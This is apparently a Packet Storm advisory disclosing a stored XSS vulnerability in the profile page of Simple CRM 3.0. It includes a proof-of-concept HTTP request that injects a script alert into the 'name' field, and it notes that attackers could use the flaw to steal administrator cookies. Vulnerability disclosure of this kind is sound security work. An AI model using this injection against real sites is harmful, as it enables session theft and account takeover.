Simple CRM version 30 suffers from a persistent cross site scripting vulnerability.
9cb42039ad4327d22e641583bda8caafb4803ac60ee4ca3dcaa19cc2bc9e26be# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)
# Date: 20/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.
Vunlerable page: /crm/profile.php
POC:
----
POST /crm/profile.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------386571683933745493952831205283
Content-Length: 779
Origin: http://localhost
Connection: close
Referer: http://localhost/crm/profile.php
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1
Upgrade-Insecure-Requests: 1
-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="name"
<script>alert('xss')</script>
-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="alt_email"
-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="phone"
0123456789
-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="gender"
m
-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="address"
-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="update"
Update
-----------------------------386571683933745493952831205283--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed